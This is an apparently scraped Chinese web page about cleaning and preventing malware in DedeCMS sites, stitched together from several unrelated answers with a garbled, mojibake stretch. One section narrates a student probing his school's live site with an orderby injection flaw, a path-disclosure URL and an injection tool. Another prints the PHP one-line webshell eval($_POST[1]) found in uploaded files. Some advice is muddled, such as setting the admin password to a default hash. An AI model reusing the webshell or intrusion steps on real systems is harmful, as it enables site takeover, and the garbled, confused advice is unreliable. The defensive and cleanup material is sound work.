dedecms plus下生成很多病毒怎么清楚和防止

dedecms plus下生成很多病毒怎么清楚和防止,第1张

dedecms漏洞危害主要有:

1泄漏管理员密码和所有网站数据,用户辛苦搭建的网站被人窃取,或公司网站丢失商业数据。

2被黑客上传恶意程序,并用于攻击其他网站。该恶意程序将瞬间消耗完服务器带宽,无法提供正常服务。

为降低dedecms受漏洞影响被黑的可能,请进行以下操作:

1更改管理员密码,加强密码强度

2更改后台管理地址

3关注官方论坛,第一时间更新dedecms补丁

4使用腾讯电脑管家等安全软件对利用该漏洞的钓鱼盗号网站进行拦截。

大部分容易!我给几组数据。比如中国CMS中,最最流行的是DedeCMS,看这几年DedeCMS都出现过多少严重的漏洞:,截个图如下:

想知道影响面?ZoomEye一下即可知道:,截图如下:

中国(很多VPS在美国)。你们能知道DedeCMS漏洞百出吗?你们能知道官方不负责吗你们能知道有多少网站早已沦陷了吗99%的人根本不关心这个,攻击者爽了,养活了一个庞大的底下产业链,基于这些被黑的网站作为跳板去黑网民!!比如QQ里传播的欺诈网址,如下是被拦截的情况:

但是,这么多被黑的DedeCMS网站,QQ不可能都拦截,否则有可能误杀好网站,这导致了黑产利用这个缺陷传播那些不会被QQ拦截的欺诈网址,黑产哪来那么多网址不都是这样黑下来的吗?我们经常联合QQ打击这些,根本打不完!还有按照我们团队(知道创宇安全研究团队)的历史应急响应情况来看,平均每天应急一个影响面还算小的高危漏洞(比如几千、几万个网站可能会被黑),平均每季度会出现一个影响全球的高危漏洞(数十万、百万网站可能都会遭殃的)。

您好

1,plus文件夹是存在网页插件的位置。

2,您出现这种情况可能是网站被人植入了木马病毒导致的。

3,建议您到腾讯电脑管家官网下载一个电脑管家。

4,安装完成后右击plus文件夹扫描病毒(电脑管家)检测一下,然后将病毒处理掉。

5,然后修改FTP密码设置成数字+字母+标点符号即可。

如果还有其他疑问和问题,欢迎再次来电脑管家企业平台进行提问,我们将尽全力为您解答疑难

注:本篇模板防盗安全设置,针对的是dedecms程序本身,不涉及其他安全设置。

下面跟大家说下常见的方式,这些方法对技术有限的人来说,可以起到模板防盗作用,对真正的高手来说,大多数网站都是仿不了的,这个大家都需要知道。

方法一:修改系统默认模板文件夹名字,最简单,也很实用

步骤:后台->系统->系统基本参数->站点设置->模板默认风格->default

把default改成你自己取的名字,然后进FTP,打开templets文件夹,把default名字改成一致,这样别人就不知道你网站模板文件夹名字了。方法二:把系统默认的htm模板文件名改一改。

大家都知道默认的模板文件的名字,如indexhtm(),list_articlehtm(文章列表页),article_articlehtm(文章内容页)等等,直接就给扒下来。

所以,我们把这些默认的名字改一改,然后去栏目管理处,重新指定一下模板文件就可以增加一下模板的安全了。

1、认识一下默认模板文件的名字及作用

首页模板:/templets/default/indexhtml

文章频道首页:/templets/default/index_articlehtm

文章列表页:/templets/default/list_articlehtm

文章内容页:/templets/default/article_articlehtm

图集频道首页:/templets/default/index_imagehtm

具体模板名介绍:

2、不同栏目各自指定不同的模板

步骤:核心->常用操作->网站栏目管理->点击右侧对应栏目的“更改”链接->高级选项->手动指定模板

详细操作方法:

3、完成以上2步,生成更新一下栏目就行了。方法三:这个方法是上2个的结合,说起来也简单,

1、后台不修改默认模板风格default的名字,在templets文件夹里面新建一个文件夹,自己取名。

2、把用到的模板文件上传到这个文件夹里面;

这里需要有一个注意,因为后台没有修改默认的模板风格位置,所有,首页、列表、内容等模板文件引用的通用页头(headhtml)、页尾(footerhtm),就需要修改一下,不然就不显示了页头页尾,方法如下:

{dede:include

filename="123456/headhtm"/}

如果你自己建立的模板文件夹名字是123456,调用代码里就写123456。

搜索页面、tag页面,都放在默认的default里面,如果放在自己建的文件夹里面,系统不认。

3、按照方法二的步骤,手动指定各个栏目的模板。

方法四:修改CSS、、JS等调用路径。

这个很重要,最好把CSS、、JS等放到网站根目录再调用。

不然的话,即使你修改了默认的风格目录,在查看网页源代码的时候,还是照样可以看到模板目录的!

好多新手在用dedecms建站的时候,没有重视这个,等模板被盗了,才发现,很让人生气,所以,我们要提前做好这些防盗的准备,提高模板的安全性。

写的比较啰嗦,主要是为了让大家能够容易理解。

开学了,返校了,又在宿舍上网了,但现在的校园网安全吗暑假中,DeDeCMS系统曝出了严重的漏洞,这个系统在很多学校的校园网中存在,黑客利用该漏洞就可以控制校园网,进行挂马、嵌入病毒……不过校园网中不乏电脑高手,下面我们就来看看“红帽”同学对自己学校网站的开学安全检测。

我的网名叫“红帽”,我猜每一个大学校园里,都有像我这样的一号人,我们对电脑充分的了解,面对互联网海洋时,就如同游泳池中的菲尔普斯一样。无论你需要找到什么东西,只要它存在于互联网之中,或者在互联网中生活过一段时间,我都能够帮助你找到源头,或者帮你把你感兴趣的东西弄到手。你猜对了,我就是黑客,活跃在校园里面的黑客。

我自认为算是高手,帮同学从别的黑客手里**回被窃的账号,在网吧让一个讨厌鬼不停的更换电脑,也曾经尝试着入侵NASA的计算机网络。

这段日子正是开学的日子,我准备对我的学校网站进行了一次安全检测。或许你要问,为什么要对自己学校的网站进行安全检测我们学校用了DeDeCMS系统(中文名称是织梦内容管理系统),这个系统在很多学校中被使用。

博弈主题:攻击DeDeCMS整站系统

技术难度:★★★★

重点知识:如何用新的DeDeCMS漏洞来入侵

DeDeCMS系统被很多学校使用并不能让我产生检测自己学校的网站的念头,真正让我产生这个念头的原因是这个系统最近曝出了严重的漏洞,不知道网管补上该漏洞没有,如果没有补上,大家回校后上校园网就危险了。

DeDeCMS身藏URL编码漏洞

这次DeDeCMS新出的漏洞是一个URL编解码漏洞,导致漏洞出现的原因是DeDeCMS的设计者在joblistphp、guestbook_adminphp等文件中对orderby参数未做过滤。黑客可以利用这些漏洞查询数据库的敏感信息,例如管理员密码、加密key等,一旦这些敏感资料被黑客掌握,要在校园网内挂马就是轻而易举的事情了,真危险。

小知识:编码是将源对象内容按照一种标准转换为一种标准格式内容。解码是和编码对应的,它使用和编码相同的标准将编码内容还原为最初的对象内容。编解码的目的最初是为了加密信息,经过加密的内容不知道编码标准的人很难识别。

实战入侵

既然知道了漏洞的成因,下面就来亲手检测一下。目前有两种方案可以实现DeDeCMS整站系统的入侵,一种是PHP脚本的入侵方案,采用这种方案,需要先在自己的本机调试好PHP解析环境,然后登录入侵的目标网站,在PHP环境中运行漏洞测试代码。不过这种方案实行起来相对复杂,因此我使用第二种进行检测,通过漏洞检测注入程序直接注入。

首先,登录学校的网站。然后打开《DeDeCMS漏洞注入检测程序》,点击“Target

Infomation”标签选项,在“URL”一项后面将寻找到的有DeDeCMS系统漏洞的网址复制粘贴到地址输入框,这里利用DeDeCMS的网站路径地址“/include/htmledit/indexphp”得到网站的物理路径。

在登录系统之后,复制浏览器地址栏中的网站路径,例如[url=http://wwwhackercom/dedecms5/include/htmledit/indexphpmodetype=basic&height[]=chinaren]http://wwwhackercom/dedecms5/include/htmledit/indexphpmodetype=basic&height[]=chinaren[/url],然后复制粘贴提交测试,粘贴完成后点击“Check”按钮,测试网站是否符合条件

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms,主要得益于两大站长网的鼎力支持;不过,人火是非多,cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms,前段时间又一次受到攻击,攻击的目的很简单,那么便是黑链,知道后稍微修改下代码就恢复了,不是很严重;这段时间网站又被莫名上传文件,类似前一次,虽然对方还没来得及修改网站模板,不过这说明网站安全防患还未到位,对方任何时候都可能再次取得管理员权限,所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底,所以就去网上找了一下相关的资料,发现这确实是dedecms的漏洞,黑客可以利用多维的变量绕过正则检测,漏洞主要发生在/plus/mytag_jsphp中,原理便是准备一个MySQL数据库来攻击已知网站的数据库,通过向数据库中写入一句话的代码,只要成功写入,那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看,黑客写入的文件主要存在于/plus/文件夹下,目前已知的几个文件包括gaphp、logphp、bphp、b1php等,文件的特征便是短小,内容很少,可能写入的时候不是很方便,不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码:<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长,不过都是这段代码的重复,至于logphp的代码,同这个类似,只有一句话,简单明了,如果你对网络安全稍有了解,那么会知道<php eval($_POST[1]);>是php一句话木马,使用部分指定的工具可以执行这段代码,预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞,同时知道对方利用什么样的原理来利用漏洞,那么要怎么预防这些危险的事发生呢?经过查询大量的资料,我初步整理出下面这些预防漏洞被利用的步骤,希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法,不管你使用的是什么版本的dedecms,都要及时在后台升级版本自动更新补丁,这是避免漏洞被利用的最重要的一步;同时官方还提供设置目录的方法,主要是设置data、templets、uploads、a为可读写不可执行权限;include、member、plus、后台管理目录等设置为可执行可读不可写入权限;删除install及special目录,具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号,随后推测密码来破解的,所以修改默认的admin账号非常重要,至于如何修改,方法很多,比较有效的是用phpadmin登陆网站数据库,找到dede_admin数据库表(dede是数据库表前缀),修改其中userid及pwd两项,其中密码一定要修改成f297a57a5a743894a0e4,这是默认的密码admin;修改后去后台登陆,登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节,同样要注意,尽量别选择太廉价的空间,太廉价的空间很容易出现服务器本身的安全问题,只要服务器出现问题,整个服务器下面的网站都没救了。还有便是,如果没必要,尽量别开通会员注册什么的,使用起来很麻烦;至于网站后台目录,不要写到robotstxt里面,同时每个月至少换一次,管理员密码什么的同样要更换,避免和别的账号密码相同被推测出来。

从你发布的可以看出,你网站已经被人种下的后门程序

1先将templets 模板文件下载到本地,用批量替换工具将挂的黑链替换,并检查templets 模板有没有后门程序,如:php 为后缀结尾的,你都分析下,里面很有可能隐藏后门程序。

2对uploadfile 程序进行备份,下载到本地,检查有没有php 为后缀结尾的 并分析

3对数据库进行备份,并将备份下载到本地

4对整个程序进行备份,并下载到本地

5删除服务器上的整个网站,在dede官方,下载一个与你程序一致的版本,上传到服务器,并重新安装

6将 检查后的 :数据库,和 uploadfile 和 templets 上传覆盖 服务器

完成以上步骤后 挂的连接 已经被清楚,包括后面程序也被清理。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » dedecms plus下生成很多病毒怎么清楚和防止

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情